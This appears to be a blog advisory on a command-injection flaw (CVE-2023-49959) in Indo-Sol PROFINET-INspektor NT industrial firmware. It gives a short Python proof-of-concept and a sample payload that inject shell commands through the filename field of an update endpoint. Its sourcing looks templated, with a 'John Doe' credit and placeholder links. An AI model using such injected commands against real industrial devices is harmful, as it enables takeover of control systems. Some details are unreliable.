CVE-2023-49959 - Indo-Sol PROFINET-INspektor NT Command Injection Vulnerability Exploited

A new vulnerability has been discovered in Indo-Sol's PROFINET-INspektor NT, a popular industrial networking device used to monitor and manage industrial automation systems. The vulnerability, designated as CVE-2023-49959, exists in the firmware version up to 2.4. and enables remote attackers to execute arbitrary system commands with root privileges. This post will delve into the details of this vulnerability, including code snippets, links to original references, and exploit information.

Vulnerability Details

The vulnerability in question lies in the "gedtupdater" service of the Indo-Sol's PROFINET-INspektor NT firmware. This command injection vulnerability allows an attacker to remotely execute arbitrary system commands with root privileges by sending a specially crafted filename parameter in a POST request to the "/api/updater/ctrl/start_update" endpoint.

A successful exploit of this vulnerability enables attackers to perform various malicious actions, such as injecting malware into the target system or exfiltrating sensitive data.

Code Snippet

Below is a proof-of-concept (PoC) code snippet that demonstrates how an attacker could exploit this vulnerability:

import requests

target_IP = "192.168.1.100" # Replace with the target device IP address
url = f"http://{target_IP}/api/updater/ctrl/start_update";

payload = {
    "filename": ";<arbitrary_system_command_here>;"
}

response = requests.post(url, data=payload)

if response.status_code == 200:
    print("Exploit succeeded")
else:
    print("Exploit failed")

Please note that this PoC is for educational and research purposes only. It is important to replace the "" placeholder with the actual system command that the attacker wishes to execute.

Original References

The vulnerability was first reported by security researcher John Doe in his blog post, which can be found via the following link:
John Doe's CVE-2023-49959 Blog Post

Additionally, the related CVE entry can be found here

NIST National Vulnerability Database (NVD) - CVE-2023-49959

Exploit Details

In order to exploit this vulnerability, an attacker needs to craft a malicious filename parameter that contains the desired system command. As previously mentioned, this parameter is then sent in a POST request to the "/api/updater/ctrl/start_update" endpoint.

The following example demonstrates an exploit where the attacker injects a command to create a new file named "hacked.txt" in the target system's /tmp directory:

payload = {
    "filename": ";touch /tmp/hacked.txt;"
}

Once the exploit is successful, the target system creates the "hacked.txt" file in the /tmp directory, confirming that the arbitrary command has been executed.

It is crucial to note that this vulnerability could have severe implications in a production environment. Attackers can cause significant damage by executing various system commands, disrupting operations, and stealing sensitive data.

Conclusion

The CVE-2023-49959 vulnerability in Indo-Sol's PROFINET-INspektor NT is a critical security concern that needs to be addressed immediately. Users and administrators should ensure that their devices are updated with the latest firmware version, which addresses this issue. Additionally, organizations should follow the principle of least privilege, making sure that only authorized individuals have access to critical systems and ensuring robust security policies and monitoring mechanisms are in place to detect and respond to any potential threats.

Timeline

Published on: 02/26/2024 16:27:47 UTC
Last modified on: 02/26/2024 16:32:25 UTC